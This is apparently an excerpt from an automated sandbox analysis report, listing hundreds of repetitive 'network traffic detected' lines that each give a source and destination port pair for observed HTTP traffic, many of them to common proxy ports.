                Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 58386
                Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 8193
                Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 9764
                Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 9401 -> 49845
                Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49906
                Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 18080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 10003
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49846
                Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 14282
                Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 9091
                Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 7853
                Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 7183
                Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 24279
                Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 1431
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49900
                Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 5430
                Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 57364
                Source: unknownNetwork traffic detected: HTTP traffic on port 50190 -> 59268
                Source: unknownNetwork traffic detected: HTTP traffic on port 50209 -> 13477
                Source: unknownNetwork traffic detected: HTTP traffic on port 50291 -> 40536
                Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 7777
                Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 42624
                Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 5000
                Source: unknownNetwork traffic detected: HTTP traffic on port 50273 -> 10710
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 49852
                Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 50062
                Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 40975
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49898
                Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 34411
                Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 4153
                Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 60080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 31908
                Source: unknownNetwork traffic detected: HTTP traffic on port 50295 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 9090 -> 49889
                Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 1337
                Source: unknownNetwork traffic detected: HTTP traffic on port 50278 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 7777
                Source: unknownNetwork traffic detected: HTTP traffic on port 7777 -> 49904
                Source: unknownNetwork traffic detected: HTTP traffic on port 50231 -> 30000
                Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 24183
                Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 7891
                Source: unknownNetwork traffic detected: HTTP traffic on port 50299 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50186 -> 8800
                Source: unknownNetwork traffic detected: HTTP traffic on port 10003 -> 50016
                Source: unknownNetwork traffic detected: HTTP traffic on port 50288 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50422 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 18080 -> 49961
                Source: unknownNetwork traffic detected: HTTP traffic on port 50375 -> 42571
                Source: unknownNetwork traffic detected: HTTP traffic on port 50413 -> 6001
                Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 51918
                Source: unknownNetwork traffic detected: HTTP traffic on port 50429 -> 5432
                Source: unknownNetwork traffic detected: HTTP traffic on port 50289 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 50292 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50450 -> 24543
                Source: unknownNetwork traffic detected: HTTP traffic on port 50325 -> 44195
                Source: unknownNetwork traffic detected: HTTP traffic on port 50408 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 50419 -> 19599
                Source: unknownNetwork traffic detected: HTTP traffic on port 50462 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 57391
                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 49478
                Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 9764
                Source: unknownNetwork traffic detected: HTTP traffic on port 50339 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50360 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50321 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50477 -> 3335
                Source: unknownNetwork traffic detected: HTTP traffic on port 50350 -> 4153
                Source: unknownNetwork traffic detected: HTTP traffic on port 50394 -> 49202
                Source: unknownNetwork traffic detected: HTTP traffic on port 50359 -> 9123
                Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 18877
                Source: unknownNetwork traffic detected: HTTP traffic on port 50523 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50391 -> 27102
                Source: unknownNetwork traffic detected: HTTP traffic on port 50250 -> 7302
                Source: unknownNetwork traffic detected: HTTP traffic on port 50400 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 12334
                Source: unknownNetwork traffic detected: HTTP traffic on port 50568 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 50543 -> 5123
                Source: unknownNetwork traffic detected: HTTP traffic on port 50529 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 9091 -> 50018
                Source: unknownNetwork traffic detected: HTTP traffic on port 50497 -> 27391
                Source: unknownNetwork traffic detected: HTTP traffic on port 50381 -> 31247
                Source: unknownNetwork traffic detected: HTTP traffic on port 50442 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50597 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50287 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 50590 -> 5529
                Source: unknownNetwork traffic detected: HTTP traffic on port 50565 -> 24397
                Source: unknownNetwork traffic detected: HTTP traffic on port 50573 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50233
                Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50498 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 8090
                Source: unknownNetwork traffic detected: HTTP traffic on port 50567 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50485 -> 5678
                Source: unknownNetwork traffic detected: HTTP traffic on port 50607 -> 18080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50544 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50614 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50512 -> 8880
                Source: unknownNetwork traffic detected: HTTP traffic on port 50651 -> 15303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30000 -> 50231
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50299
                Source: unknownNetwork traffic detected: HTTP traffic on port 50575 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50731 -> 27207
                Source: unknownNetwork traffic detected: HTTP traffic on port 5432 -> 50429
                Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 24543 -> 50450
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50288
                Source: unknownNetwork traffic detected: HTTP traffic on port 50650 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 50695 -> 29197
                Source: unknownNetwork traffic detected: HTTP traffic on port 50694 -> 31571
                Source: unknownNetwork traffic detected: HTTP traffic on port 50701 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50595 -> 8083
                Source: unknownNetwork traffic detected: HTTP traffic on port 50514 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50626 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50337 -> 32824
                Source: unknownNetwork traffic detected: HTTP traffic on port 50291 -> 40536
                Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 42624
                Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 9990
                Source: unknownNetwork traffic detected: HTTP traffic on port 50788 -> 23685
                Source: unknownNetwork traffic detected: HTTP traffic on port 50640 -> 63055
                Source: unknownNetwork traffic detected: HTTP traffic on port 50840 -> 2233
                Source: unknownNetwork traffic detected: HTTP traffic on port 50700 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50684 -> 8182
                Source: unknownNetwork traffic detected: HTTP traffic on port 50867 -> 26693
                Source: unknownNetwork traffic detected: HTTP traffic on port 44195 -> 50325
                Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50714 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50708 -> 52858
                Source: unknownNetwork traffic detected: HTTP traffic on port 50720 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50857 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 50077
                Source: unknownNetwork traffic detected: HTTP traffic on port 50874 -> 28723
                Source: unknownNetwork traffic detected: HTTP traffic on port 50742 -> 18080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 31679
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50597
                Source: unknownNetwork traffic detected: HTTP traffic on port 50805 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50754 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50893 -> 10049
                Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 50860 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50791 -> 7117
                Source: unknownNetwork traffic detected: HTTP traffic on port 50315 -> 82
                Source: unknownNetwork traffic detected: HTTP traffic on port 50977 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50321
                Source: unknownNetwork traffic detected: HTTP traffic on port 50913 -> 5432
                Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 45883
                Source: unknownNetwork traffic detected: HTTP traffic on port 50796 -> 6005
                Source: unknownNetwork traffic detected: HTTP traffic on port 50295 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 20001
                Source: unknownNetwork traffic detected: HTTP traffic on port 50792 -> 9090
                Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50887 -> 5430
                Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50498
                Source: unknownNetwork traffic detected: HTTP traffic on port 18080 -> 50607
                Source: unknownNetwork traffic detected: HTTP traffic on port 50897 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50113
                Source: unknownNetwork traffic detected: HTTP traffic on port 50961 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 5005
                Source: unknownNetwork traffic detected: HTTP traffic on port 50723 -> 58386
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50544
                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 49858
                Source: unknownNetwork traffic detected: HTTP traffic on port 50987 -> 58714
                Source: unknownNetwork traffic detected: HTTP traffic on port 51024 -> 9764
                Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 34411
                Source: unknownNetwork traffic detected: HTTP traffic on port 50984 -> 34411
                Source: unknownNetwork traffic detected: HTTP traffic on port 50930 -> 57144
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50442
                Source: unknownNetwork traffic detected: HTTP traffic on port 51035 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 9123 -> 50359
                Source: unknownNetwork traffic detected: HTTP traffic on port 51030 -> 58703
                Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 51918
                Source: unknownNetwork traffic detected: HTTP traffic on port 1431 -> 50148
                Source: unknownNetwork traffic detected: HTTP traffic on port 51028 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 57391
                Source: unknownNetwork traffic detected: HTTP traffic on port 51036 -> 12334
                Source: unknownNetwork traffic detected: HTTP traffic on port 50901 -> 5000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51011 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51026 -> 7891
                Source: unknownNetwork traffic detected: HTTP traffic on port 51108 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50316 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 17145 -> 49985
                Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 3933
                Source: unknownNetwork traffic detected: HTTP traffic on port 51064 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51056 -> 26887
                Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 5432 -> 50913
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50700
                Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51096 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 7777
                Source: unknownNetwork traffic detected: HTTP traffic on port 51033 -> 8800
                Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 59243
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50805
                Source: unknownNetwork traffic detected: HTTP traffic on port 51027 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49932
                Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 50514
                Source: unknownNetwork traffic detected: HTTP traffic on port 51042 -> 1951
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50720
                Source: unknownNetwork traffic detected: HTTP traffic on port 51038 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51094 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50529
                Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 4153
                Source: unknownNetwork traffic detected: HTTP traffic on port 51039 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51134 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51165 -> 54917
                Source: unknownNetwork traffic detected: HTTP traffic on port 51097 -> 4153
                Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 8899
                Source: unknownNetwork traffic detected: HTTP traffic on port 51113 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51065 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51151 -> 15291
                Source: unknownNetwork traffic detected: HTTP traffic on port 51155 -> 10513
                Source: unknownNetwork traffic detected: HTTP traffic on port 51157 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50194 -> 24787
                Source: unknownNetwork traffic detected: HTTP traffic on port 13477 -> 50209
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50360
                Source: unknownNetwork traffic detected: HTTP traffic on port 999 -> 49802
                Source: unknownNetwork traffic detected: HTTP traffic on port 51185 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 50843 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 51137 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 36694
                Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 34144
                Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51190 -> 22942
                Source: unknownNetwork traffic detected: HTTP traffic on port 51146 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50840 -> 2233
                Source: unknownNetwork traffic detected: HTTP traffic on port 50291 -> 40536
                Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 24183
                Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 42624
                Source: unknownNetwork traffic detected: HTTP traffic on port 51161 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50244 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50564 -> 15864
                Source: unknownNetwork traffic detected: HTTP traffic on port 51194 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 58703 -> 51030
                Source: unknownNetwork traffic detected: HTTP traffic on port 24397 -> 50565
                Source: unknownNetwork traffic detected: HTTP traffic on port 50250 -> 7302
                Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 18877
                Source: unknownNetwork traffic detected: HTTP traffic on port 9990 -> 50187
                Source: unknownNetwork traffic detected: HTTP traffic on port 50708 -> 52858
                Source: unknownNetwork traffic detected: HTTP traffic on port 1337 -> 50205
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51113
                Source: unknownNetwork traffic detected: HTTP traffic on port 50684 -> 8182
                Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 51027
                Source: unknownNetwork traffic detected: HTTP traffic on port 7777 -> 50051
                Source: unknownNetwork traffic detected: HTTP traffic on port 5529 -> 50590
                Source: unknownNetwork traffic detected: HTTP traffic on port 50287 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 50987 -> 58714
                Source: unknownNetwork traffic detected: HTTP traffic on port 50295 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50984 -> 34411
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51108
                Source: unknownNetwork traffic detected: HTTP traffic on port 50930 -> 57144
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 51146
                Source: unknownNetwork traffic detected: HTTP traffic on port 51165 -> 54917
                Source: unknownNetwork traffic detected: HTTP traffic on port 7117 -> 50791
                Source: unknownNetwork traffic detected: HTTP traffic on port 51197 -> 31679
                Source: unknownNetwork traffic detected: HTTP traffic on port 51186 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51167 -> 8880
                Source: unknownNetwork traffic detected: HTTP traffic on port 51207 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51181 -> 29985
                Source: unknownNetwork traffic detected: HTTP traffic on port 50328 -> 22500
                Source: unknownNetwork traffic detected: HTTP traffic on port 51233 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51218 -> 5935
                Source: unknownNetwork traffic detected: HTTP traffic on port 50232 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51192 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50402 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 50258 -> 49865
                Source: unknownNetwork traffic detected: HTTP traffic on port 51191 -> 8083
                Source: unknownNetwork traffic detected: HTTP traffic on port 50207 -> 3129
                Source: unknownNetwork traffic detected: HTTP traffic on port 51230 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51235 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51205 -> 5678
                Source: unknownNetwork traffic detected: HTTP traffic on port 51216 -> 18080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50206 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50385 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 51257 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50467 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51246 -> 5430
                Source: unknownNetwork traffic detected: HTTP traffic on port 51283 -> 5432
                Source: unknownNetwork traffic detected: HTTP traffic on port 51274 -> 30717
                Source: unknownNetwork traffic detected: HTTP traffic on port 51277 -> 29813
                Source: unknownNetwork traffic detected: HTTP traffic on port 50612 -> 51507
                Source: unknownNetwork traffic detected: HTTP traffic on port 51016 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 34144
                Source: unknownNetwork traffic detected: HTTP traffic on port 51140 -> 12792
                Source: unknownNetwork traffic detected: HTTP traffic on port 51263 -> 36181
                Source: unknownNetwork traffic detected: HTTP traffic on port 50518 -> 9090
                Source: unknownNetwork traffic detected: HTTP traffic on port 50631 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 50761 -> 19770
                Source: unknownNetwork traffic detected: HTTP traffic on port 50773 -> 4228
                Source: unknownNetwork traffic detected: HTTP traffic on port 50738 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 36694
                Source: unknownNetwork traffic detected: HTTP traffic on port 50722 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51358 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 50741 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51380 -> 31147
                Source: unknownNetwork traffic detected: HTTP traffic on port 50632 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50337 -> 32824
                Source: unknownNetwork traffic detected: HTTP traffic on port 51042 -> 1951
                Source: unknownNetwork traffic detected: HTTP traffic on port 50707 -> 4444
                Source: unknownNetwork traffic detected: HTTP traffic on port 50537 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 34411
                Source: unknownNetwork traffic detected: HTTP traffic on port 50676 -> 40571
                Source: unknownNetwork traffic detected: HTTP traffic on port 51395 -> 44523
                Source: unknownNetwork traffic detected: HTTP traffic on port 10513 -> 51155
                Source: unknownNetwork traffic detected: HTTP traffic on port 51328 -> 3389
                Source: unknownNetwork traffic detected: HTTP traffic on port 51373 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 51039 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 5432 -> 51283
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50843
                Source: unknownNetwork traffic detected: HTTP traffic on port 50807 -> 56581
                Source: unknownNetwork traffic detected: HTTP traffic on port 51438 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 50822 -> 28513
                Source: unknownNetwork traffic detected: HTTP traffic on port 51390 -> 19925
                Source: unknownNetwork traffic detected: HTTP traffic on port 50899 -> 58851
                Source: unknownNetwork traffic detected: HTTP traffic on port 51336 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 50968 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51436 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50963 -> 9000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51433 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51427 -> 10010
                Source: unknownNetwork traffic detected: HTTP traffic on port 4228 -> 50773
                Source: unknownNetwork traffic detected: HTTP traffic on port 50840 -> 2233
                Source: unknownNetwork traffic detected: HTTP traffic on port 51439 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51445 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51449 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51005 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51358
                Source: unknownNetwork traffic detected: HTTP traffic on port 51452 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51069 -> 39782
                Source: unknownNetwork traffic detected: HTTP traffic on port 51483 -> 5432
                Source: unknownNetwork traffic detected: HTTP traffic on port 51432 -> 7891
                Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 999 -> 50650
                Source: unknownNetwork traffic detected: HTTP traffic on port 51467 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51472 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51441 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51461 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 4153
                Source: unknownNetwork traffic detected: HTTP traffic on port 51434 -> 5000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51455 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51419 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51446 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51538 -> 5050
                Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 57391
                Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 51918
                Source: unknownNetwork traffic detected: HTTP traffic on port 51437 -> 8800
                Source: unknownNetwork traffic detected: HTTP traffic on port 20001 -> 50956
                Source: unknownNetwork traffic detected: HTTP traffic on port 51464 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51462 -> 8880
                Source: unknownNetwork traffic detected: HTTP traffic on port 51545 -> 3051
                Source: unknownNetwork traffic detected: HTTP traffic on port 51059 -> 27391
                Source: unknownNetwork traffic detected: HTTP traffic on port 51547 -> 4595
                Source: unknownNetwork traffic detected: HTTP traffic on port 51465 -> 8083
                Source: unknownNetwork traffic detected: HTTP traffic on port 51458 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51496 -> 21861
                Source: unknownNetwork traffic detected: HTTP traffic on port 51507 -> 10000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51501 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51551 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51435 -> 58386
                Source: unknownNetwork traffic detected: HTTP traffic on port 51578 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 34144
                Source: unknownNetwork traffic detected: HTTP traffic on port 5432 -> 51483
                Source: unknownNetwork traffic detected: HTTP traffic on port 51550 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51098 -> 49202
                Source: unknownNetwork traffic detected: HTTP traffic on port 51568 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51535 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51575 -> 31679
                Source: unknownNetwork traffic detected: HTTP traffic on port 51174 -> 15410
                Source: unknownNetwork traffic detected: HTTP traffic on port 51534 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51580 -> 64935
                Source: unknownNetwork traffic detected: HTTP traffic on port 10010 -> 51427
                Source: unknownNetwork traffic detected: HTTP traffic on port 50315 -> 82
                Source: unknownNetwork traffic detected: HTTP traffic on port 51165 -> 54917
                Source: unknownNetwork traffic detected: HTTP traffic on port 51189 -> 666
                Source: unknownNetwork traffic detected: HTTP traffic on port 51565 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51612 -> 1403
                Source: unknownNetwork traffic detected: HTTP traffic on port 51260 -> 31908
                Source: unknownNetwork traffic detected: HTTP traffic on port 51516 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51557 -> 38832
                Source: unknownNetwork traffic detected: HTTP traffic on port 51675 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 51116 -> 6008
                Source: unknownNetwork traffic detected: HTTP traffic on port 51196 -> 62969
                Source: unknownNetwork traffic detected: HTTP traffic on port 51582 -> 5430
                Source: unknownNetwork traffic detected: HTTP traffic on port 51598 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51614 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51782 -> 14738
                Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 14921
                Source: unknownNetwork traffic detected: HTTP traffic on port 51684 -> 1087
                Source: unknownNetwork traffic detected: HTTP traffic on port 51605 -> 29985
                Source: unknownNetwork traffic detected: HTTP traffic on port 51179 -> 5678
